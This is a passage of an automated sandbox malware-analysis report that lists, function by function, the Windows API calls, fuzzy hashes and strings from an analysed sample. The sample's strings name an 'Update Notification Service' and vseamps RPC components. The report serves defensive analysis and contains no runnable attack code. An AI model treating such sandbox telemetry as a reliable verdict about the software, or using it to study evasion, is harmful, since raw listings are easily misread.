                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$Info
                      • String ID:
                      • API String ID: 1775632426-0
                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                      APIs
                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB272EB,?,?,?,00007FF8BFB23EC0,?,?,?,?,00007FF8BFB23CFD), ref: 00007FF8BFB271B1
                      • GetLastError.KERNEL32(?,?,?,00007FF8BFB272EB,?,?,?,00007FF8BFB23EC0,?,?,?,?,00007FF8BFB23CFD), ref: 00007FF8BFB271BF
                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB272EB,?,?,?,00007FF8BFB23EC0,?,?,?,?,00007FF8BFB23CFD), ref: 00007FF8BFB271E9
                      • FreeLibrary.KERNEL32(?,?,?,00007FF8BFB272EB,?,?,?,00007FF8BFB23EC0,?,?,?,?,00007FF8BFB23CFD), ref: 00007FF8BFB27257
                      • GetProcAddress.KERNEL32(?,?,?,00007FF8BFB272EB,?,?,?,00007FF8BFB23EC0,?,?,?,?,00007FF8BFB23CFD), ref: 00007FF8BFB27263
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Library$Load$AddressErrorFreeLastProc
                      • String ID: api-ms-
                      • API String ID: 2559590344-2084034818
                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                      • Instruction ID: 44d12d7d01dba00803d12d15943905f342455cc7f1d9188530706e04b6cf182e
                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                      • Instruction Fuzzy Hash: 7831E521A1AB4291FE16AB8AA4005BD6794FF49BE0FA90635EF1D07790EF3CE445C704
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                      • Instruction ID: cd55e3a016d51dda692a4eb4d48cc03ca58192586efa6fd40a39d29622dfbecb
                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                      • Instruction Fuzzy Hash: 21215B24A4C64B46FA69A3ED555513D6B42AF487F0F944738EB3E06ACAEE2CE4419300
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                      • String ID: CONOUT$
                      • API String ID: 3230265001-3130406586
                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                      • Instruction ID: 85df8ca9a7aef5679845f395b9d1d1308d09e29dd83220b7edb66da928573736
                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                      • Instruction Fuzzy Hash: 5B116032B98B4186E7508B9AF84432973A0FB88BE4F044234EB5D87B94CF7CD5588744
                      APIs
                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                      • String ID: vseamps
                      • API String ID: 3197017603-3944098904
                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Messagesprintf_s
                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                      • API String ID: 2642950106-3610746849
                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                      APIs
                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 319667368-0
                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                      APIs
                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                      • String ID:
                      • API String ID: 1390108997-0
                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                      • String ID: csm$csm$csm
                      • API String ID: 3523768491-393685449
                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                      • Instruction ID: 4bcded3bb897e8c48f338ede107084ba8e20ce0a0c75b2f0e454504c4fec1665
                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                      • Instruction Fuzzy Hash: B6E1A133A087828AE7209FACD4807AD7BA0FB457C8F945535DB9D57A96CF38E592C700
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB295CB
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB29601
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB2962E
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB2963F
                      • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB29650
                      • SetLastError.KERNEL32(?,?,?,00007FF8BFB28BC9,?,?,?,?,00007FF8BFB28C14), ref: 00007FF8BFB2966B
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                      • Instruction ID: e49637fc7f104fdbc831b05cbbbded54e597573cb478f79bf43f86ecff398923
                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                      • Instruction Fuzzy Hash: 16116D24B4C64B46FA5963A9995513D2B92AF497F0FC44739EB3E067C6DE2CE4429300
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                      • String ID:
                      • API String ID: 3326452711-0
                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                      • API String ID: 2984211723-1229430080
                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                      • Instruction ID: 1f1a208715bbbb575c3b3d8c1561e3e586b9318c877d8c6e8baac9aa4dd88e99
                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                      • Instruction Fuzzy Hash: 1AF06265B99A4681EB108BACE84433A6320AF847E1F940735CB6D466F4CF2CD149C740
                      APIs
                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                      • ExitProcess.KERNEL32 ref: 0000000140008545
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressExitHandleModuleProcProcess
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 75539706-1276376045
                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                      • Instruction ID: 00d49294babeae4e67d55265b000124671cc036d1142c4d88dfad3f9b2dd399d
                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                      • Instruction Fuzzy Hash: D9B18332A0A686C1EA69DB9AD48027D6F90EF54BC4F998435DF4D07F8ADF3DE4518300
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
